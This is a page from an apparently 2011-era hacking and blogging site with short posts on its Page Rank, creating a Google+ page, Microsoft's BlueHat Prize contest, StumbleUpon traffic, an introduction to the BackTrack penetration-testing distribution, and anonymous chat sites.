Surprisingly HWS Blessed With Page-Rank 2.0!!

Tweet

Never thought November could be such a blessing in my life! Just within 2 months of its release, HWS has amazingly being blessed with a Google Page Rank 2, which is a measure of a HWS's importance in the eyes of the Mega Search Engine like Google.

When the domain was on blogger i.e. blogspot.com ,the google page rank was 3 , but as I bought the .com domain the google page rank dropped to zero but now with the help of ALLAH , it again comes back to 2 and INSHAHLLAH within month we will surely achieve the page rank of 3 - 4 .

I am extremely thankful to all of my readers for their continuous support, love and dearest motivation. Verily I could not have achieved this success without the active participation and support of our readers because half the credit goes to all of you guys for gifting HWS with precious content everyday with your keen,lovely and relevant comments.

Thumbs up to HWS and thumbs up to all of you readers for believing and trusting in the Moto of publishing unique content on Hacking and Online Earning. I thank Allah and then every single visitor, follower and subscriber without them the success of this day indeed would have no taste and flavour. God bless you all!

Today’s Lesson:- Be Unique in everything that you do for success itself is coloured uniqely and when success knocks your doors it really feels mind blowing! :D

Read More

Create a Google+ Fan Page - Latest feature on G+

Tweet

Google plus added a new feature named Google plus Fan page or Follower page. It is as same as Facebook Fan Page, the only difference lies in +1 and like . In Facebook we have to like the page but in Google+ we have to +1 the page and also to follow it. The follow link is given in the top right corner while the +1 link is given under the display picture of Google page. It is a good way to drive your traffic from Google+ to Your site or blog .So let's see how to create it .

Steps to Create a Google+ Page

• First of all go to Google Plus Pages.
• Choose Local Product or Brand as your category.You may choose any other according to your need.

 

• Now fill all the details as shown above e.g. page name and site link etc.
• Tick the Agree box to accept the terms and now click on CREATE button.
• You have successfully created a Google+ page for your website.
• Now invite your friends to follow it.
• Now give keywords to describe your page and also upload the blog logo.
• Now start posting on your page and also inform others to follow it.

NOTE : If you like this post then follow our HWS Fan Page on Google+ . You may also Follow Me on Google+.

Read More

Microsoft Blue Hat Prize Contest for Hackers

Tweet

WHY MICROSOFT IS DOING THIS?

The Microsoft BlueHat Prize contest is designed to generate new ideas for defensive approaches to support computer security. As part of our commitment to a more secure computing experience, we hope to inspire security researchers to develop innovative solutions intended to address serious security threats.

WHAT IS THE CONTEST?

The inaugural Microsoft BlueHat Prize contest challenges security researchers to design a novel runtime mitigation technology designed to prevent the exploitation of memory safety vulnerabilities. The solution considered to be the most innovative by the Microsoft BlueHat Prize board will be presented the grand prize of US $200,000. Important information:

• Entries will be accepted and must be received by email to bluehatprize@microsoft.com between August 3, 2011 to midnight Pacific Time on April 1, 2012.
• The winning entry will be announced at Black Hat USA 2012.
• Submitters retain all rights to the intellectual property in the content they submit and Microsoft has the right to license that content.

YOU COULD WIN

• First prize: $200,000 (USD)
• Second prize: $50,000 (USD)
• Third prize: MSDN Universal subscription valued at $10,000 (USD)

HOW TO ENTER?

• To enter, send an email to bluehatprize@microsoft.com include your technical description and prototype as outlined in the official rules.
• The Microsoft BlueHat Prize board will reply with additional information applicants will need to submit a complete entry.

Read More

Get Huge Traffic from StumbleUpon to Your Blog / Site

Tweet

StumbleUpon is a very popular social bookmarking website which drives loads more traffic to your site.Mostly people don't know what StumbleUpon is. Its a simple bookmarking site used to bookmark your pages.It helps you to discover and share great websites. By using StumbleUpon’s browser toolbar, you can connect with stumblers those who are interested to your topics and share your information. This social bookmarking website gives you pages that others, with the same kinds of interests, have highlighted in their searches.

For Instance : If you’re someone who enjoys reading information on internet tools topics, then you would be shown places to check out that contains internet tools information.

SignUp for your Stumbleupon Account

• Create your Stumbleupon account. 
• Make sure you have added all the details along with profile image, gender, date of birth, these details will help you to get more visible in StumbleUpon engine.

Download and Install StumbleUpon toolbar

StumbleUpon is a discovery engine and it recommends the best of the web, personalized just for you. Discover useful and entertaining content and information with StumbleUpon anytime, wherever you are, from any device. So get one of them :

• Add the stumbleupon addon for mozilla firefox @ https://addons.mozilla.org/en-US/firefox/addon/138/ 
• Add the stumbleupon addon for Google Chrome @ https://chrome.google.com/extensions/detail/kcahibnffhnnjcedflmchmokndkjnhpg 
• Add the stumbleupon addon for Internet Explorer @http://www.stumbleupon.com/download.php 
• For android mobile browsers, the addon @ https://market.android.com/details?id=com.stumbleupon.android.app

Choose Your Topics of Interest

Now you have to specify what kind of site you owned which you would like to stumble, by selecting your topics of interest. Go to Settings > Manage Interests, browse through all the available master categories listed on the left column and among them select the topics you are interested in. Make sure you save the page before you navigate to another page!. You may select your interests upto maximum of 127 topics out of 500 topics

Connect with your friends on StumbleUpon

• Now add more friends.
• They will help you to get more views for your favorite or newly discovered topics. 
• You may share your favorites easily by importing your email contacts, and also add the people who have same interests in stumbleupon, stumbleupon itself suggest you to find friends those who are having same interests to you.

Start sharing sites with other Stumblers

• Now start sharing your favorite websites,blogs or webpages with other stumblers. 
• StumbleUpon account make it easy for you to find friends you already know in real life, who are also on StumbleUpon.

Make New Discovers

• Make new discovered webpages and allow stumblers to view and review it. 
• The more people will subscribe to your favorites, more friends requests you will get and become popular there , and in future your stumbles will have potential to generate more exposure. 
• Don't submit your links from one particular website more frequently. This may lead you to loose your community members due to get boring of your information that you keep posting

Surf Around StumbleUpon and Give Some Thumbs Up

• Now move around with your interest and find others stumbles and like their stumbles and also make review,. this is one of the finest way to get your account more familiarize.

Note : In case you’re new to StumbleUpon, to stumble means to click the Stumble! button in your web bar or StumbleUpon browser extension to browse pictures, videos, articles, other blogs and much more that StumbleUpon recommends just for you based on your unique mix of interests, preferences, and friend.

Read More

BackTrack : Intro to the beast.

Tweet

Hey guys how are you... Xeo Hacker suggested that it wud be better to discuss backtrack from very beginning. Although there are previously some posts on backtrack but m marking it as first post . here we go :

What is BackTrack

Although most of you know this still in case you dont , m writing about wat this is actually .
This is basically a Ubuntu/Linux based Operating System in Gnome as well as KDE flavours. BackTrack is named after an algorithm "backtracking" . This is made ,keeping digital forensics and penetration testing in mind.
Backtrack is originated from two earlier distribution who focused on penetration testing:

• WHAX
• Auditor Security Collection

whats so special about this  ???

You must have heard backtrack here n there . Why its so special in the field of hacking and why hackers are using it frequently ???
Is it necessary to use BT for hacking ???  These are some questions we'll be discussing here.

Why its so special !!!
It is special because of its pre-installed CLI and GUI tools for hacking ,mostly for penetration testing and digital forensics. It has a lot of inbuilt tools which helps u in a complete Security assesment ....

Is it necessary yo use BT in hacking ???
BT is not necessary but its highly recommended for hacking . If you wish to get benefits of backtrack without using BT then u have to install more than 200 tools . And if u r interested in hacking , why to suffer all these troubles , simply install backtrack.

Tools Included

As i said there are more than 200 inbuilt tools in bactrack , and i cant list all of them , but in backtrack tools are arranged in a very good manners .

BackTrack arranges tools into 12 categories:

• Information Gathering
• Vulnerability Assesment
• Exploitation
• Privilege Escalation 
• Maintaining Access
• Reverse Engineering
• RFID tools
• Stress Testing Tools
• Forensics
• Reporting tools
• Services
• Miscellaneous

Thats it.


Ok guys thats all for this post , will post very soon again.
Hope u enjoyed this post , thank you for reading .
Stay Tuned !

" Copyright © 2011. All rights reserved by “Kumar Sourav" & "xeo hacker" "

Read More

5 Best Sites to Chat Anonymously with Random People

Tweet

Are you bored of talking to your regular gtalk friends? Want to meet strangers online? If you are looking for such place to chat with complete random people totally unknown to you, then check the below listed sites and the best thing for these sites is No one would know your personal details and you will chat as an anonymous. No one would ever know who you are and your identity will remain totally hidden.

Criteria : These websites automatically pick users randomly and let you have one-to-one chat directly. Your personal details including your name or email are not asked and hence not revealed to anyone (unless you want to reveal).

#1. Omegle

Omegle is the most popular site among all of these sites to talk to strangers. You can have either text or video chats (webcam necessary) based on your interest. This is also available for iPhone in App Store.

#2. iMeetzu

iMeetzu is another popular site to chat to strangers,it connects you to first random person available on chat. It also offers other wide variety of features e.g. map search, user search and registration for keeping logs. It also works on iphone.

#3. A Nice Chat

 ANiceChat claims to be first established stranger chat website. Its a flash based site and very easy to use.

#4. Getting Random

Getting Random is the only site which requires registration though with your facebook account but still your identity is hidden and you chat as an anonymous.

#5. Iddin

Iddin provides some extra features not provided by above sites like you can choose people from your home country, other countries or just anybody. You may also share photos with your chat partner.

Read More